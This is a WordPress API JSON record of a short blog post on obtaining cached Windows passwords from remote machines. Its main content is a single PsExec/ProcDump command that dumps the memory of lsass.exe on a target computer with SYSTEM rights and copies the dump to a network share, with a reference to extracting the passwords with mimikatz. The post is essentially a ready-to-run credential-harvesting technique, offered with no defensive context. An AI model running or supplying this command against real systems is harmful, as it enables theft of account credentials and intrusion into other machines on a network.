{"id":2957,"date":"2016-10-05T20:59:07","date_gmt":"2016-10-05T19:59:07","guid":{"rendered":"http:\/\/www.edwardsd.co.uk\/work\/?p=2957"},"modified":"2017-06-01T11:51:26","modified_gmt":"2017-06-01T10:51:26","slug":"obtaining-local-passwords-from-memory-dump","status":"publish","type":"post","link":"https:\/\/www.edwardsd.co.uk\/work\/2016\/10\/obtaining-local-passwords-from-memory-dump\/","title":{"rendered":"Obtaining local Passwords from Memory Dump"},"content":{"rendered":"<p>Outputting memory dump of Windows security sessions. (Obtaining passwords stored locally in cache). This can be run against a remote system to obtain password credential\u00a0information. This requires &#8220;local administrator&#8221; rights on the remote PC being targeted.<\/p>\n<p>Requires: <a href=\"https:\/\/goo.gl\/x8NwoS\" target=\"_blank\">PsExec<\/a> &amp; <a href=\"https:\/\/goo.gl\/YqBKv6\" target=\"_blank\">ProcDump<\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">psexec \\\\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\\\server\\logs\\computername.log<\/pre>\n<p>Reference:\u00a0https:\/\/cyberarms.wordpress.com\/2015\/03\/16\/grabbing-passwords-from-memory-using-procdump-and-mimikatz\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Outputting memory dump of Windows security sessions. (Obtaining passwords stored locally in cache). This can be run against a remote system to obtain password credential\u00a0information. This requires &#8220;local administrator&#8221; rights on the remote PC being targeted. Requires: PsExec &amp; ProcDump psexec \\\\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\\\server\\logs\\computername.log Reference:\u00a0https:\/\/cyberarms.wordpress.com\/2015\/03\/16\/grabbing-passwords-from-memory-using-procdump-and-mimikatz\/<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[21,10],"tags":[],"class_list":["post-2957","post","type-post","status-publish","format-standard","hentry","category-code","category-tools"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/pOPt8-LH","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/posts\/2957","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/comments?post=2957"}],"version-history":[{"count":3,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/posts\/2957\/revisions"}],"predecessor-version":[{"id":3254,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/posts\/2957\/revisions\/3254"}],"wp:attachment":[{"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/media?parent=2957"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/categories?post=2957"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.edwardsd.co.uk\/work\/wp-json\/wp\/v2\/tags?post=2957"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}